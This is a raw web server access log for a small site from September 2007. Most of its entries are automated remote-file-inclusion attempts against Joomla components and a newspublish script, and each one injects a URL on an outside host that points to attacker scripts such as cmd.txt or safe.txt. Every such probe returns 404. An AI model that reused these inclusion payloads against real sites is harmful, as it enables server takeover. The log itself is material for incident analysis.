209.172.57.13 - - [13/Sep/2007:07:57:32 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.techcore.org/dmd/locales/en/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
195.200.91.130 - - [13/Sep/2007:08:02:25 -0700] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.freewebs.com/qmono/safe.txt? HTTP/1.1" 404 294 "-" "libwww-perl/5.805" "www.projectpr.com"
203.32.125.78 - - [13/Sep/2007:08:03:03 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=www.infostec.hpg.com.br/spread.jpg? HTTP/1.1" 404 289 "-" "libwww-perl/5.805" "www.projectpr.com"
205.234.135.19 - - [13/Sep/2007:08:04:26 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.isslimited.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
193.51.99.193 - - [13/Sep/2007:08:04:57 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 289 "-" "libwww-perl/5.805" "www.projectpr.com"
68.20.55.106 - - [13/Sep/2007:08:07:29 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
85.125.18.34 - - [13/Sep/2007:08:08:59 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.dol-i-tab.com/joomla/thief/idthief.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
85.125.18.34 - - [13/Sep/2007:08:11:06 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.dol-i-tab.com/joomla/thief/idthief.txt? HTTP/1.1" 404 290 "-" "libwww-perl/5.805" "www.projectpr.com"
212.51.54.46 - - [13/Sep/2007:08:13:33 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.dol-i-tab.com/joomla/thief/idthief.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
205.234.135.19 - - [13/Sep/2007:08:17:06 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://www.isslimited.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.135.19 - - [13/Sep/2007:08:17:06 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.isslimited.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
194.231.186.101 - - [13/Sep/2007:08:17:37 -0700] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.techcore.org/dmd/locales/en/id.txt? HTTP/1.1" 404 321 "-" "libwww-perl/5.800" "www.projectpr.com"
216.120.237.150 - - [13/Sep/2007:08:20:33 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
216.120.237.150 - - [13/Sep/2007:08:20:34 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
216.120.237.150 - - [13/Sep/2007:08:20:34 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
193.51.99.193 - - [13/Sep/2007:08:20:38 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 305 "-" "libwww-perl/5.805" "www.projectpr.com"
193.51.99.193 - - [13/Sep/2007:08:20:39 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
85.125.18.34 - - [13/Sep/2007:08:22:45 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.dol-i-tab.com/joomla/thief/idthief.txt? HTTP/1.1" 404 306 "-" "libwww-perl/5.805" "www.projectpr.com"
85.125.18.34 - - [13/Sep/2007:08:22:45 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.dol-i-tab.com/joomla/thief/idthief.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
85.125.18.34 - - [13/Sep/2007:08:22:51 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.dol-i-tab.com/joomla/thief/idthief.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
85.125.18.34 - - [13/Sep/2007:08:22:51 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.dol-i-tab.com/joomla/thief/idthief.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
68.20.55.106 - - [13/Sep/2007:08:23:12 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
68.20.55.106 - - [13/Sep/2007:08:23:13 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
193.51.99.193 - - [13/Sep/2007:08:24:31 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
205.234.135.19 - - [13/Sep/2007:08:24:33 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.isslimited.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
203.32.125.78 - - [13/Sep/2007:08:26:39 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=www.infostec.hpg.com.br/spread.jpg? HTTP/1.1" 404 289 "-" "libwww-perl/5.805" "www.projectpr.com"
212.170.248.194 - - [13/Sep/2007:08:31:22 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.projectpr.com"
205.234.135.19 - - [13/Sep/2007:08:33:57 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://www.isslimited.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.135.19 - - [13/Sep/2007:08:33:57 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.isslimited.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
212.51.54.46 - - [13/Sep/2007:08:35:43 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.dol-i-tab.com/joomla/thief/idthief.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
212.51.54.46 - - [13/Sep/2007:08:35:44 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.dol-i-tab.com/joomla/thief/idthief.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
193.51.99.193 - - [13/Sep/2007:08:36:56 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 305 "-" "libwww-perl/5.805" "www.projectpr.com"
193.51.99.193 - - [13/Sep/2007:08:36:56 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
201.34.25.249 - - [13/Sep/2007:08:38:51 -0700] "GET /logs/access.log=http://andravarldar.se/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
219.84.134.33 - - [13/Sep/2007:08:48:31 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://zmetea.tripod.com/id.txt? HTTP/1.1" 404 290 "-" "libwww-perl/5.805" "www.projectpr.com"
219.84.134.33 - - [13/Sep/2007:08:48:31 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://zmetea.tripod.com/id.txt? HTTP/1.1" 404 290 "-" "libwww-perl/5.805" "www.projectpr.com"
74.53.79.146 - - [13/Sep/2007:08:53:33 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://www.techcore.org/dmd/locales/en/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.53.79.146 - - [13/Sep/2007:08:53:34 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.techcore.org/dmd/locales/en/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.53.79.146 - - [13/Sep/2007:08:53:34 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.techcore.org/dmd/locales/en/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
203.32.125.78 - - [13/Sep/2007:08:54:29 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=www.infostec.hpg.com.br/spread.jpg? HTTP/1.1" 404 305 "-" "libwww-perl/5.805" "www.projectpr.com"
203.32.125.78 - - [13/Sep/2007:08:54:29 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=www.infostec.hpg.com.br/spread.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
203.32.125.78 - - [13/Sep/2007:08:54:32 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=www.infostec.hpg.com.br/spread.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
203.32.125.78 - - [13/Sep/2007:08:54:32 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=www.infostec.hpg.com.br/spread.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
219.84.134.33 - - [13/Sep/2007:09:13:33 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://zmetea.tripod.com/id.txt? HTTP/1.1" 404 306 "-" "libwww-perl/5.805" "www.projectpr.com"
219.84.134.33 - - [13/Sep/2007:09:13:33 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://zmetea.tripod.com/id.txt? HTTP/1.1" 404 306 "-" "libwww-perl/5.805" "www.projectpr.com"
219.84.134.33 - - [13/Sep/2007:09:13:33 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://zmetea.tripod.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
219.84.134.33 - - [13/Sep/2007:09:13:33 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://zmetea.tripod.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
85.17.3.183 - - [13/Sep/2007:09:19:47 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://forum.wrhunski.com/style_emoticons/cmd.txt? HTTP/1.1" 404 289 "-" "libwww-perl/5.79" "www.projectpr.com"
140.123.101.147 - - [13/Sep/2007:09:29:58 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Gaisbot/3.0+(robot06@gais.cs.ccu.edu.tw;+http://gais.cs.ccu.edu.tw/robot.php)" "www.projectpr.com"
70.87.118.244 - - [13/Sep/2007:09:49:06 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://polosudnord.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
70.87.118.244 - - [13/Sep/2007:09:49:06 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://polosudnord.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
70.87.118.244 - - [13/Sep/2007:09:49:06 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://polosudnord.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
216.120.237.150 - - [13/Sep/2007:10:03:18 -0700] "GET /logs/access.log/newspublish/include.php?path[docroot]=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 285 "-" "libwww-perl/5.808" "www.projectpr.com"
216.120.237.150 - - [13/Sep/2007:10:03:18 -0700] "GET /newspublish/include.php?path[docroot]=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.808" "www.projectpr.com"
216.120.237.150 - - [13/Sep/2007:10:03:18 -0700] "GET /logs/newspublish/include.php?path[docroot]=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 274 "-" "libwww-perl/5.808" "www.projectpr.com"
75.35.155.112 - - [13/Sep/2007:10:09:43 -0700] "GET / HTTP/1.1" 200 10036 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; IEMB3; IEMB3)" "www.projectpr.com"
75.35.155.112 - - [13/Sep/2007:10:09:43 -0700] "GET /clipart/pageHeaders/greenLeafBridge.gif HTTP/1.1" 200 47456 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; IEMB3; IEMB3)" "www.projectpr.com"
75.35.155.112 - - [13/Sep/2007:10:09:44 -0700] "GET /clipart/lines/horizontal/darkgreen_gradient.gif HTTP/1.1" 200 709 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; IEMB3; IEMB3)" "www.projectpr.com"
75.35.155.112 - - [13/Sep/2007:10:09:44 -0700] "GET /clipart/images/sidebars/leafLeft.gif HTTP/1.1" 200 33964 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; IEMB3; IEMB3)" "www.projectpr.com"
75.35.155.112 - - [13/Sep/2007:10:09:45 -0700] "GET /sitebuilder/images/navbar-0-active-65203.png HTTP/1.1" 200 250 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; IEMB3; IEMB3)" "www.projectpr.com"
75.35.155.112 - - [13/Sep/2007:10:09:45 -0700] "GET /sitebuilder/images/navbar-1-inactive-65328.png HTTP/1.1" 200 273 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; IEMB3; IEMB3)" "www.projectpr.com"
75.35.155.112 - - [13/Sep/2007:10:09:46 -0700] "GET /sitebuilder/images/navbar-2-inactive-65484.png HTTP/1.1" 200 303 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; IEMB3; IEMB3)" "www.projectpr.com"
75.35.155.112 - - [13/Sep/2007:10:09:46 -0700] "GET /images/promo_mail.gif HTTP/1.1" 200 1469 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; IEMB3; IEMB3)" "www.projectpr.com"
75.35.155.112 - - [13/Sep/2007:10:09:46 -0700] "GET /sitebuilder/images/navbar-3-inactive-65640.png HTTP/1.1" 200 298 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; IEMB3; IEMB3)" "www.projectpr.com"
75.35.155.112 - - [13/Sep/2007:10:09:46 -0700] "GET /sitebuilder/images/navbar-0-mouseOver-65265.png HTTP/1.1" 200 250 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; IEMB3; IEMB3)" "www.projectpr.com"
75.35.155.112 - - [13/Sep/2007:10:09:46 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; IEMB3; IEMB3)" "www.projectpr.com"
75.35.155.112 - - [13/Sep/2007:10:09:46 -0700] "GET /sitebuilder/images/navbar-0-active-65203.png HTTP/1.1" 304 - "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; IEMB3; IEMB3)" "www.projectpr.com"
75.35.155.112 - - [13/Sep/2007:10:09:46 -0700] "GET /sitebuilder/images/navbar-1-mouseOver-65421.png HTTP/1.1" 200 273 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; IEMB3; IEMB3)" "www.projectpr.com"
75.35.155.112 - - [13/Sep/2007:10:09:46 -0700] "GET /aboutus.html HTTP/1.1" 200 9447 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; IEMB3; IEMB3)" "www.projectpr.com"
75.35.155.112 - - [13/Sep/2007:10:09:47 -0700] "GET /clipart/pageHeaders/greenLeafBridge.gif HTTP/1.1" 304 - "http://www.projectpr.com/aboutus.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; IEMB3; IEMB3)" "www.projectpr.com"
75.35.155.112 - - [13/Sep/2007:10:09:47 -0700] "GET /clipart/images/sidebars/leafLeft.gif HTTP/1.1" 304 - "http://www.projectpr.com/aboutus.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; IEMB3; IEMB3)" "www.projectpr.com"
75.35.155.112 - - [13/Sep/2007:10:09:47 -0700] "GET /clipart/lines/horizontal/darkgreen_gradient.gif HTTP/1.1" 304 - "http://www.projectpr.com/aboutus.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; IEMB3; IEMB3)" "www.projectpr.com"
75.35.155.112 - - [13/Sep/2007:10:09:47 -0700] "GET /images/crop_pers1275692242.jpg HTTP/1.1" 200 2974 "http://www.projectpr.com/aboutus.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; IEMB3; IEMB3)" "www.projectpr.com"
75.35.155.112 - - [13/Sep/2007:10:09:47 -0700] "GET /sitebuilder/images/navbar-0-inactive-65062.png HTTP/1.1" 200 250 "http://www.projectpr.com/aboutus.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; IEMB3; IEMB3)" "www.projectpr.com"
75.35.155.112 - - [13/Sep/2007:10:09:47 -0700] "GET /sitebuilder/images/navbar-1-active-65375.png HTTP/1.1" 200 273 "http://www.projectpr.com/aboutus.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; IEMB3; IEMB3)" "www.projectpr.com"
75.35.155.112 - - [13/Sep/2007:10:09:47 -0700] "GET /sitebuilder/images/navbar-2-inactive-65484.png HTTP/1.1" 304 - "http://www.projectpr.com/aboutus.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; IEMB3; IEMB3)" "www.projectpr.com"
75.35.155.112 - - [13/Sep/2007:10:09:47 -0700] "GET /sitebuilder/images/navbar-3-inactive-65640.png HTTP/1.1" 304 - "http://www.projectpr.com/aboutus.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; IEMB3; IEMB3)" "www.projectpr.com"
75.35.155.112 - - [13/Sep/2007:10:09:47 -0700] "GET /images/promo_mail.gif HTTP/1.1" 304 - "http://www.projectpr.com/aboutus.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; IEMB3; IEMB3)" "www.projectpr.com"
75.35.155.112 - - [13/Sep/2007:10:09:48 -0700] "GET /sitebuilder/images/navbar-1-mouseOver-65421.png HTTP/1.1" 304 - "http://www.projectpr.com/aboutus.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; IEMB3; IEMB3)" "www.projectpr.com"
75.35.155.112 - - [13/Sep/2007:10:09:48 -0700] "GET /sitebuilder/images/navbar-1-active-65375.png HTTP/1.1" 304 - "http://www.projectpr.com/aboutus.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; IEMB3; IEMB3)" "www.projectpr.com"
75.35.155.112 - - [13/Sep/2007:10:09:48 -0700] "GET /sitebuilder/images/navbar-0-mouseOver-65265.png HTTP/1.1" 304 - "http://www.projectpr.com/aboutus.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; IEMB3; IEMB3)" "www.projectpr.com"
209.205.196.4 - - [13/Sep/2007:10:17:54 -0700] "GET /logs/access.log/newspublish/include.php?path[docroot]=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
209.205.196.4 - - [13/Sep/2007:10:17:54 -0700] "GET /newspublish/include.php?path[docroot]=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
209.205.196.4 - - [13/Sep/2007:10:17:54 -0700] "GET /logs/newspublish/include.php?path[docroot]=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
122.152.129.54 - - [13/Sep/2007:10:19:44 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Baiduspider+(+http://www.baidu.com/search/spider_jp.html)" "www.projectpr.com"
85.17.3.183 - - [13/Sep/2007:10:22:42 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://forum.wrhunski.com/style_emoticons/cmd.txt? HTTP/1.1" 404 305 "-" "libwww-perl/5.79" "www.projectpr.com"
85.17.3.183 - - [13/Sep/2007:10:22:43 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://forum.wrhunski.com/style_emoticons/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
212.241.214.57 - - [13/Sep/2007:10:37:57 -0700] "GET /logs/access.log/newspublish/include.php?path[docroot]=http://c-pw.ch/cms/upload/thumbs/140_666_SIMG6666.jpg.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
212.241.214.57 - - [13/Sep/2007:10:37:58 -0700] "GET /newspublish/include.php?path[docroot]=http://c-pw.ch/cms/upload/thumbs/140_666_SIMG6666.jpg.jpg? HTTP/1.1" 404 269 "-" "libwww-perl/5.803" "www.projectpr.com"
212.241.214.57 - - [13/Sep/2007:10:37:58 -0700] "GET /logs/newspublish/include.php?path[docroot]=http://c-pw.ch/cms/upload/thumbs/140_666_SIMG6666.jpg.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
140.123.101.147 - - [13/Sep/2007:11:06:25 -0700] "GET / HTTP/1.0" 200 10036 "-" "Gaisbot/3.0+(robot06@gais.cs.ccu.edu.tw;+http://gais.cs.ccu.edu.tw/robot.php)" "www.projectpr.com"
195.216.80.33 - - [13/Sep/2007:11:48:52 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
195.216.80.33 - - [13/Sep/2007:11:48:53 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
195.216.80.33 - - [13/Sep/2007:11:48:53 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
195.216.80.33 - - [13/Sep/2007:11:50:42 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.thebarnraisers.com/xpl/safe.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
219.84.134.33 - - [13/Sep/2007:12:04:24 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://zmetea.tripod.com/id.txt? HTTP/1.1" 404 289 "-" "libwww-perl/5.805" "www.projectpr.com"
219.84.134.33 - - [13/Sep/2007:12:04:24 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://zmetea.tripod.com/id.txt? HTTP/1.1" 404 289 "-" "libwww-perl/5.805" "www.projectpr.com"
193.51.99.193 - - [13/Sep/2007:12:07:43 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 290 "-" "libwww-perl/5.805" "www.projectpr.com"
193.51.99.193 - - [13/Sep/2007:12:22:38 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 306 "-" "libwww-perl/5.805" "www.projectpr.com"
193.51.99.193 - - [13/Sep/2007:12:22:38 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
219.84.134.33 - - [13/Sep/2007:12:24:01 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://zmetea.tripod.com/id.txt? HTTP/1.1" 404 305 "-" "libwww-perl/5.805" "www.projectpr.com"
